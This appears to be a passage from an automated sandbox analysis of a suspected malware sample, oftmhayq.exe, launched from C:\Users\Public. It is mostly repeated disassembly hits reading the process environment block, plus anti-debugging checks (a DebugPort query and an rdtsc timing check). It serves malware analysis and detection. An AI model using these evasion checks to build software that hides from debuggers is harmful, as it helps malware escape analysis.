          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Users\Public\oftmhayq.exe Process queried: DebugPort
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409A90 rdtsc 29_2_00409A90
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0040ACD0 LdrLoadDll,29_2_0040ACD0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130513A mov eax, dword ptr fs:[00000030h]29_2_0130513A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013190AF mov eax, dword ptr fs:[00000030h]29_2_013190AF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9080 mov eax, dword ptr fs:[00000030h]29_2_012D9080
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h]29_2_012D3880
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h]29_2_012D3880
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353884 mov eax, dword ptr fs:[00000030h]29_2_01353884
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353884 mov eax, dword ptr fs:[00000030h]29_2_01353884
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D58EC mov eax, dword ptr fs:[00000030h]29_2_012D58EC
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h]29_2_012FB8E4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h]29_2_012FB8E4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]29_2_012D40E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]29_2_012D40E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]29_2_012D40E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]29_2_012E28FD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]29_2_012E28FD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]29_2_012E28FD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov ecx, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h]29_2_012D70C0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h]29_2_012D70C0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013918CA mov eax, dword ptr fs:[00000030h]29_2_013918CA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h]29_2_012D78D6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h]29_2_012D78D6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov ecx, dword ptr fs:[00000030h]29_2_012D78D6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h]29_2_0139B0C7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h]29_2_0139B0C7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139131B mov eax, dword ptr fs:[00000030h]29_2_0139131B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h]29_2_01303B7A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h]29_2_01303B7A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DDB60 mov ecx, dword ptr fs:[00000030h]29_2_012DDB60
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]29_2_01366365
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]29_2_01366365
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]29_2_01366365
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D7B70 mov eax, dword ptr fs:[00000030h]29_2_012D7B70
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]29_2_012EF370
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]29_2_012EF370
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]29_2_012EF370
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8B58 mov eax, dword ptr fs:[00000030h]29_2_013A8B58
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]29_2_01303B5A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]29_2_01303B5A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]29_2_01303B5A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]29_2_01303B5A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DDB40 mov eax, dword ptr fs:[00000030h]29_2_012DDB40
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DF358 mov eax, dword ptr fs:[00000030h]29_2_012DF358
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A9BBE mov eax, dword ptr fs:[00000030h]29_2_013A9BBE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8BB6 mov eax, dword ptr fs:[00000030h]29_2_013A8BB6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391BA8 mov eax, dword ptr fs:[00000030h]29_2_01391BA8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]29_2_01304BAD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]29_2_01304BAD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]29_2_01304BAD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A5BA5 mov eax, dword ptr fs:[00000030h]29_2_013A5BA5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130B390 mov eax, dword ptr fs:[00000030h]29_2_0130B390
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h]29_2_012E1B8F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h]29_2_012E1B8F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302397 mov eax, dword ptr fs:[00000030h]29_2_01302397
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139138A mov eax, dword ptr fs:[00000030h]29_2_0139138A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h]29_2_012FEB9A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h]29_2_012FEB9A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138D380 mov ecx, dword ptr fs:[00000030h]29_2_0138D380
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4B94 mov edi, dword ptr fs:[00000030h]29_2_012D4B94
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]29_2_0130138B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]29_2_0130138B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]29_2_0130138B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov ecx, dword ptr fs:[00000030h]29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D1BE9 mov eax, dword ptr fs:[00000030h]29_2_012D1BE9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FDBE9 mov eax, dword ptr fs:[00000030h]29_2_012FDBE9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h]29_2_013823E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h]29_2_013823E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov eax, dword ptr fs:[00000030h]29_2_013823E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013053C5 mov eax, dword ptr fs:[00000030h]29_2_013053C5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013553CA mov eax, dword ptr fs:[00000030h]29_2_013553CA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013553CA mov eax, dword ptr fs:[00000030h]29_2_013553CA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h]29_2_012D4A20
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h]29_2_012D4A20
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391229 mov eax, dword ptr fs:[00000030h]29_2_01391229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]29_2_012D8239
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]29_2_012D8239
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]29_2_012D8239
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h]29_2_01314A2C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h]29_2_01314A2C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E8A0A mov eax, dword ptr fs:[00000030h]29_2_012E8A0A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov ecx, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h]29_2_0139AA16
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h]29_2_0139AA16
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F3A1C mov eax, dword ptr fs:[00000030h]29_2_012F3A1C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h]29_2_012DAA16
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h]29_2_012DAA16
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]29_2_012D5210
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov ecx, dword ptr fs:[00000030h]29_2_012D5210
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]29_2_012D5210
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]29_2_012D5210
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131927A mov eax, dword ptr fs:[00000030h]29_2_0131927A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h]29_2_0138B260
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h]29_2_0138B260
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8A62 mov eax, dword ptr fs:[00000030h]29_2_013A8A62
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]29_2_01315A69
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]29_2_01315A69
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]29_2_01315A69
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01364257 mov eax, dword ptr fs:[00000030h]29_2_01364257
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391A5F mov eax, dword ptr fs:[00000030h]29_2_01391A5F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139EA55 mov eax, dword ptr fs:[00000030h]29_2_0139EA55
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]29_2_012D9240
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]29_2_012D9240
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]29_2_012D9240
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]29_2_012D9240
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FAB0 mov eax, dword ptr fs:[00000030h]29_2_0130FAB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D1AA0 mov eax, dword ptr fs:[00000030h]29_2_012D1AA0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov esi, dword ptr fs:[00000030h]29_2_013012BD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov eax, dword ptr fs:[00000030h]29_2_013012BD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov eax, dword ptr fs:[00000030h]29_2_013012BD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]29_2_012E62A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]29_2_012E62A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]29_2_012E62A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]29_2_012E62A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h]29_2_01305AA0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h]29_2_01305AA0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h]29_2_012EAAB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h]29_2_012EAAB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139129A mov eax, dword ptr fs:[00000030h]29_2_0139129A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h]29_2_0130D294
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h]29_2_0130D294
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h]29_2_0130DA88
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h]29_2_0130DA88
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]29_2_0139B2E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]29_2_0139B2E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]29_2_0139B2E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]29_2_0139B2E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302AE4 mov eax, dword ptr fs:[00000030h]29_2_01302AE4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3ACA mov eax, dword ptr fs:[00000030h]29_2_012D3ACA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8ADD mov eax, dword ptr fs:[00000030h]29_2_013A8ADD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]29_2_012D5AC0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]29_2_012D5AC0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]29_2_012D5AC0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D12D4 mov eax, dword ptr fs:[00000030h]29_2_012D12D4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302ACB mov eax, dword ptr fs:[00000030h]29_2_01302ACB
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139E539 mov eax, dword ptr fs:[00000030h]29_2_0139E539
